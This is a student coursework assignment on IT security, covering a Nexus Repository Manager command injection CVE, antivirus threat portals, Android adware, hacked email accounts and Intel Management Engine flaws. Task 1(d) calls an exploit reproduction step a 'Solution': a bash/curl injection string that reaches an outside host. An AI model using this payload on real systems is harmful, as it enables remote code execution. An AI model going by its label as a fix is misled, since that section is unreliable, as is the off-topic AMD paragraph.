Security in Computing and IT Assignment 1: Analysis and Solutions

Added on  2022/09/02

This assignment delves into the realm of security in computing and IT, encompassing a detailed analysis of vulnerabilities, mitigation strategies, and real-world examples. Task 1 focuses on a recent vulnerability from the National Vulnerability Database (NVD), providing a description, impact assessment using CVSS scores (both version 2 and 3), and proposed solutions. The assignment also explores strategies to mitigate cyber security incidents, referencing the ASD's guidelines. Task 2 investigates various antivirus companies' websites, evaluating their risk criteria and vulnerability reporting. Task 3 examines mobile threats, specifically adware, and their global impact. Task 4 addresses email security, outlining potential hacking methods and recommended countermeasures. Finally, Task 5 discusses the Intel Management Engine and its security implications, including mitigation strategies. The assignment demonstrates a comprehensive understanding of security concepts and practical application of knowledge.
Running head: Security in Computing and IT
Security in Computing and IT
Name of the Student
Name of the University
Author Note
Table of Contents
Task 1:
Task 2:
Task 3:
Task 4:
  Three ways of email account can be hacked:
  The things to do at the time email gets hacked:
    Change the passcode:
    Check the setting:
    Scan your computer:
  Tools:
    Avanan Cloud Security Platform:
    SpamTitan:
Task 5:
  Intel Management Engine:
  AMD equivalent:
  Security concern:
  Intel’s responsibility:
  Response of computer vendors:
  Article:
Task 1:
a)
Link: https://nvd.nist.gov/vuln/detail/CVE-2019-15588#vulnCurrentDescriptionTitle
An OS command injection vulnerability exists in Nexus Repository Manager 2.14.14
(a bypass of CVE-2019-5475) which might allow a hacker remote code execution (RCE).
All instances that use CommandLineExecutor.java, including the Yum Configuration
capability, are affected.
b)
CVSS Score version 2: 9.0 HIGH
Vector: (AV:N/AC:L/Au:S/C:C/I:C/A:C)
Complexity: Low
Impact sub-score: 10.0
Confidentiality: Complete
CVSS Score version 3:
Score: 7.2 HIGH
Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
Complexity: Low
Impact score: 5.9
Confidentiality: High
c)
Mitigation strategies:
Application whitelisting: This strategy prevents the execution of malicious and
unapproved programs, including .exe files, DLLs and scripts.
Patch applications: The applications need to be patched, and the users have to use the
applications in their latest version.
Purpose of using CVSS scores:
The CVSS attempts for assigning severity scores to the vulnerabilities that provide
allowance to the responders for prioritizing the resources and responses in accord with the
threats. The scores can be calculated on the basis of a formula that is having dependency on
various matrices. The CVSS scores are used to determine temporal, severity as well as
environmental scores that are exist too. The present version of CVSS is CVSSv3.1 which was
released in June, 2019.
d)
Solution:
1. Navigate to the capabilities in the Nexus repository manager.
2. Create or edit a new Yum: capability of configuration.
3. Set path of "createrepo" or "mergerepo" to an OS command (/bin / bash -c curl $
{IFS} http:// 192.168.88.1:8000 // createrepo).
e)
Task 2:
a)
McAfee: https://www.mcafee.com/enterprise/en-us/threat-center.html#
Kaspersky: https://threats.kaspersky.com/
AVG: https://www.avg.com/en-in/about-viruses
Bitdefender: https://threatmap.bitdefender.com/
b)
Anti-virus: McAfee
Risk criteria: The website has described the risk criteria very well as one can easily. There is a threat centre included in the site.
Date: The dates are mentioned on the site, such as when the threats were determined.
Recommendation: The website should provide mitigation techniques for current vulnerabilities. The developers need to manage the options in such a way that someone can access all the information easily.
Description: The users can learn about top quality cyber security threats in the threat landscape dashboard.

Anti-virus: Kaspersky
Risk criteria: The risks are described very well on the site. There is a threat centre included in the site.
Date: The dates are mentioned on the site, such as when the threats were determined.
Recommendation: The developers need to add bullet points so that all the information can be found easily.
Description: Kaspersky is antivirus software that provides security to sites and personal PCs.

Anti-virus: AVG
Risk criteria: One can easily find the mitigation plan for a threat.
Date: The dates are mentioned on the site, such as when the threats were determined.
Recommendation: The developers need to manage the options in such a way that someone can access all the information easily.
Description: Devices, data and offices can remain safe with the antivirus.

Anti-virus: Bitdefender
Risk criteria: There is a threat centre included in the site. The risks are described very well on the site.
Date: The dates are mentioned on the site, such as when the threats were determined.
Recommendation: The interface of the website needs to improve, as all the information is hazy.
Description: The antivirus provides internet security to sites.
c)
The vulnerabilities and threats are listed on the websites. However, the threats cannot
be found easily, as things are very hazy to find on the sites. To compare the threats, the
user needs to take one vulnerability from each site and compare them manually.
d)
The threats are listed on all of the sites, but the way they are listed differs for each site.
To compare the threats, the user needs to take one vulnerability from each site and
compare them manually.
For analysing the threats Kaspersky is the best, as all the threats are listed well on the
site. Screenshot attached below.
Task 3:
a)
Threat 1: https://threats.kaspersky.com/en/threat/Adware.AndroidOS.Dilidi/
These applications try to obtain super user rights on a device and periodically connect to a
server in order to download and stealthily install other applications. In addition, they monitor
all applications installed on the device and send information about them to a server.
Threat 2: https://threats.kaspersky.com/en/threat/Adware.AndroidOS.Ewind/
Adware of this family shows advertising banners on the infected device and inserts ads in
browsers. Some modifications of AdWare.AndroidOS.Ewind insert ads in social networking
apps.
b)
The threats have been spread through vulnerable advertisements. The hackers have monitored
what is installed on the devices.
c)
Serial  Country             % of users attacked worldwide*
1       Russian Federation  25.57
2       India               14.58
3       Algeria             4.10
4       Indonesia           4.08
5       Bangladesh          3.85
6       Ukraine             3.07
7       Philippines         1.91
8       Nigeria             1.73
9       Nepal               1.70
10      Vietnam             1.59
d)
The hackers have monitored what is installed on the devices. The hackers have spread the
threats through malicious ads that appeared on the victims’ computers; when the victim
accessed the ad, the system was attacked by the hackers.
e)
The user has to install antivirus on the system.
The user has to keep the system up to date.
Task 4:
a)
Three ways of email account can be hacked:
The user may fall for a phishing scam which asks the user to confirm the passcode.
These types of scam emails can be convincing.
The user did not log out of the account after logging in from a public device or PC.
The user might use a weak passcode that can be guessed easily, or similar passcodes
have been used on multiple sites.
b)
The things to do at the time email gets hacked:
Change the passcode:
The attackers do not always change the account password. This means the user can still
retrieve the account by getting the OTP via forgot password. By changing the password to
a secure one, the user will be able to protect the email account from future or further
attacks.
Check the setting:
After changing the password, the user has to check the account settings and whether
anything on the account has been changed. The attackers can also forward emails from the
account to their own account. The user has to check for that too.
Scan your computer:
The users have to run malware scans regularly. When the account has been hacked, the user
has to check for remnants or malware which might be active on the user's computer. The
user also has to make sure that the password is unique and long for all of the sites.
c)
Tools:
There are several tools available in the market for providing more security to the
email account. Some of them are listed below:
Avanan Cloud Security Platform:
The Avanan Cloud Security Platform is available at 3 levels: complete cloud security,
complete malware security and anti-phishing. The tool draws on innovative security
technologies from the top vendors of the industry.
SpamTitan:
This tool is from Titan HQ, which is the lead in anti-spam filtering. It can control,
protect and clean against unwanted mail while blocking viruses, spam and malware.
Task 5:
a)
Intel Management Engine:
The Intel Management Engine has been included within Intel chipsets since the year 2008.
It is basically a small computer inside another computer, with full access to the
computer's memory, input devices, network and display. The code that it runs is written
and developed by Intel, which has not shared detailed information about its inner
workings.
AMD equivalent:
Current data indicates that Spectre or Meltdown has minimal impact on gaming. AMD has
APUs. This is marketing jargon for a graphics processor and CPU that are built onto the
same chip. The APUs come in various types such as A4, A6, A8 and A10, as well as recent
chips like A12. They are like the i3, i5 or i7 processors developed by Intel. The
processors developed by AMD have decent amounts of processing power, and they are really
impressive for their graphical capabilities. It can be said that the A10 processor of AMD
is equivalent to the Core i5 processor of Intel.
b)
Security concern:
The Intel Management Engine software, also known as Intel ME, has been in the news for
security holes that were announced by Intel on 20th November, 2017. The users need to
patch the system if the system is vulnerable. The presence of the software deep within
each modern system that has an Intel processor means that the system is an easy target
for hackers.
Intel’s responsibility:
On the 1st of May, 2017, Intel confirmed that a remote elevation of privilege bug
(SA-00075) existed in its management technology. All Intel platforms that are provisioned
with Intel standard manageability, small management technology and active management
technology have a remotely exploitable security hole in the ME.
Response of computer vendors:
Normally it is not possible for users to disable the ME. Some undocumented methods have
been discovered. However, these methods are not supported by Intel. The security
architecture of the ME was designed to prevent it from being disabled.
Article:
NEWMAN, L., 2017. Intel chip flaws leave millions of devices exposed.
Security experts have warned about Intel's Management Engine for years. A new set of
confirmed vulnerabilities, which impact servers, PCs and IoT devices, shows that they
may be right.
c)
Mitigation strategies:
The users have to update the ME firmware.
The users have to update the Intel ME host OS components, such as the Intel(R)
Management & Security Status software, the Intel Management Engine Interface Driver and
the LMS service.
The users have to review the configuration of the ME OS components.
The users have to block ports 16992-16995 on the endpoints and firewalls.